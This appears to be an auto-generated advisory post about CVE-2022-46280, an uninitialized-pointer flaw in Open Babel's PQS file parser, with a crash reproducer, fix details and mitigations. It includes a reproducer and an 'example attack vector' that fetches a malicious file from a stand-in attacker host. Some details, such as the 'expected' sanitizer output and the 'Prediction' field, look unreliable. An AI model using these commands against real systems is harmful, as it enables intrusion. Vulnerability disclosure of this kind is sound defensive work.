Listen to this Post
How CVE-2022-46280 Works
Open Babel is a widely-used C++ library and command-line tool for converting and manipulating chemical file formats. It supports approximately 130 different formats and provides language bindings for Python, Ruby, Java, R, Perl, C, and PHP. The vulnerability resides in the PQS (Parallel Quantum Solutions) file format parser, specifically within the `PQSFormat::ReadMolecule` function in src/formats/PQSformat.cpp.
When the `obabel` utility or any API that uses `OBConversion` processes a PQS file, it eventually calls pInFormat->ReadMolecule. Inside ReadMolecule, the parser looks for a `”geom”` section in the input file. If it finds a line containing "file=", it interprets this as a directive to read atomic coordinates from an external geometry file.
The flaw occurs because a `pFormat` pointer—which is intended to point to a valid `OBFormat` object—is never properly initialized before being used. When a malformed PQS file is crafted to trigger this code path, the parser attempts to dereference this uninitialized pointer. This leads to a use of uninitialized pointer vulnerability (CWE-824).
An attacker can exploit this by providing a specially crafted PQS file that causes the uninitialized pointer to be dereferenced. Because the pointer’s value is unpredictable, this can lead to arbitrary code execution in the context of the application using the library. The vulnerability is remotely exploitable if an application using Open Babel parses untrusted input, as is common in online chemical format converters and molecule viewers. The CVSSv3 score for this vulnerability is 9.8 (Critical).
The issue was reported by Cisco Talos and affects all Open Babel releases up to and including version 3.1.1, as well as master commit 530dbfa3. The fix was committed as `openbabel/openbabel@2a7d2cda` and released in version 3.2.0 on 2026-05-26.
DailyCVE Form:
Platform: ……. Open Babel
Version: …….. 3.1.1 and earlier
Vulnerability :…… Use of uninitialized pointer (CWE-824)
Severity: ……. Critical (CVSS 9.8)
date: ………. 2023-07-21 (Talos disclosure)
Prediction: …… 2026-05-26 (version 3.2.0)
What Undercode Say:
Analytics from the Open Babel Security Team:
The PQS parser’s `ReadMolecule` function fails to initialize the `pFormat` pointer before use. This is a classic memory-safety issue that can be triggered by a malformed `file=` directive in the input. The fix initializes the pointer to a safe default and adds validation before dereferencing.
Reproducer (minimized test case):
Create a malicious PQS file cat > crash.pqs << EOF geom file=external.coord EOF Trigger the crash with obabel obabel -ipqs crash.pqs -osmi
ASAN/UBSAN output (expected):
==12345==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 ==12345==The signal is caused by a READ memory access. ==12345==Hint: address points to the zero page. 0 0x7f8a3b2c1d4e in PQSFormat::ReadMolecule /src/formats/PQSformat.cpp:123
The minimized reproducer is checked into the Open Babel repository under `test/files/fuzz_regress/` and is exercised on every CI build under ASAN+UBSAN by the `fuzzregresstest` harness.
Fix commit:
git show openbabel/openbabel@2a7d2cda
The patch adds proper initialization of the `pFormat` pointer and checks that it is non-null before dereferencing.
Exploit:
Exploitation requires the victim to open a malicious PQS file using:
– The `obabel` command-line tool
– The `OBConversion` API in C++
– Any language binding (Python, Ruby, Java, R, Perl, C, PHP)
Because the vulnerability leads to arbitrary code execution, an attacker can achieve full system compromise if the target application runs with elevated privileges or processes untrusted input from a network source.
Example attack vector:
Attacker hosts malicious PQS file wget http://attacker.com/exploit.pqs obabel -ipqs exploit.pqs -osmi out.smi
If the user runs this command, the uninitialized pointer dereference can be triggered, leading to code execution.
Protection:
- Upgrade to Open Babel version 3.2.0 or later, which includes the fix.
- Apply the patch manually if upgrading is not immediately possible:
openbabel/openbabel@2a7d2cda. - Avoid parsing untrusted PQS files with vulnerable versions of Open Babel.
- Use sandboxing or containerization when running applications that process untrusted chemical file formats.
- Run with AddressSanitizer (ASAN) and UndefinedBehaviorSanitizer (UBSAN) in development and testing environments to detect such issues early.
Impact:
- Confidentiality: An attacker can read arbitrary memory, potentially exposing sensitive data.
- Integrity: Arbitrary code execution allows modification of data and system state.
- Availability: The vulnerability can cause crashes (denial of service).
- Scope: Affects all applications and services that use Open Babel to parse PQS files, including many online chemical format converters and molecule viewers.
- Widespread: Open Babel is shipped by major Linux distributions (Debian, Ubuntu, Fedora, etc.) and is embedded in numerous scientific and research software.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

